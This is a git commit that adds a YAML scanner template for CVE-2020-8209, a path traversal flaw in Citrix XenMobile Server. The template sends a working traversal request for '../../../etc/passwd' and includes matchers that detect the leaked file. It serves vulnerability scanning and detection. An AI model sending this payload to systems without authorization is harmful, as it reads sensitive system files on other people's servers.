🔥 Add CVE-2020-8209

References: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
2020-11-16 21:49:51 +07:00 · 2020-11-16 21:49:51 +07:00 · d6198665e7
parent 2187e142b1
commit d6198665e7
1 changed files with 31 additions and 0 deletions
--- a/cves/CVE-2020-8209.yaml
+++ b/cves/CVE-2020-8209.yaml
@ -0,0 +1,31 @@
+id: cve-2020-8209
+
+info:
+  name: Citrix XenMobile Server Path Traversal
+  author: dwisiswant0
+  severity: high
+  description: |
+    Improper access control in Citrix XenMobile Server 10.12 before RP2,
+    Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10
+    before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files.
+
+    References:
+    - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body
+      - type: word
+        words:
+          - "fileDownload=true"
+          - "application/octet-stream"
+          - "attachment;"
+        condition: and
+        part: header